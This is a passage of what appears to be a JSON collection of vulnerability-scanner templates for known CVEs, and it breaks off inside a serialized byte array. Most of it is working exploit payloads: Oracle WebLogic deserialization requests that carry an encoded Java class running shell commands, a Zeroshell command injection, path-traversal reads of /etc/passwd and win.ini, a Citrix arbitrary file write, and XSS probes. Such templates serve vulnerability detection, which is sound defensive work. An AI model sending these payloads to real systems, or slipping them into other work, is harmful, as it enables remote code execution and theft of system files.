h0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"word","words":["\"users\":","\"total\":","\"header\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","negative":true,"words":["Showing 0 of 0 matching users"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>37</byte></void><void index=\"397\"><byte>7</byte></void><void index=\"398\"><byte>0</byte></void><void index=\"399\"><byte>38</byte></void><void index=\"400\"><byte>1</byte></void><void index=\"401\"><byte>0</byte></void><void index=\"402\"><byte>16</byte></void><void index=\"403\"><byte>115</byte></void><void index=\"404\"><byte>101</byte></void><void index=\"405\"><byte>114</byte></void><void index=\"406\"><byte>105</byte></void><void index=\"407\"><byte>97</byte></void><void index=\"408\"><byte>108</byte></void><void index=\"409\"><byte>86</byte></void><void index=\"410\"><byte>101</byte></void><void index=\"411\"><byte>114</byte></void><void index=\"412\"><byte>115</byte></void><void index=\"413\"><byte>105</byte></void><void index=\"414\"><byte>111</byte></void><void index=\"415\"><byte>110</byte></void><void index=\"416\"><byte>85</byte></void><void index=\"417\"><byte>73</byte></void><void index=\"418\"><byte>68</byte></void><void index=\"419\"><byte>1</byte></void><void index=\"420\"><byte>0</byte></void><void index=\"421\"><byte>1</byte></void><void index=\"422\"><byte>74</byte></void><void index=\"423\"><byte>1</byte></void><void index=\"424\"><byte>0</byte></void><void index=\"425\"><byte>13</byte></void><void index=\"426\"><byte>67</byte></void><void index=\"427\"><byte>111</byte></void><void index=\"428\"><byte>110</byte></void><void index=\"429\"><byte>115</byte></void><void index=\"430\"><byte>116</byte></void><void index=\"431\"><byte>97</byte></void><void index=\"432\"><byte>110</byte></void><void index=\"433\"><byte>116</byte></void><void index=\"434\"><byte>86</byte></void><void index=\"435\"><byte>97</byte></void><void 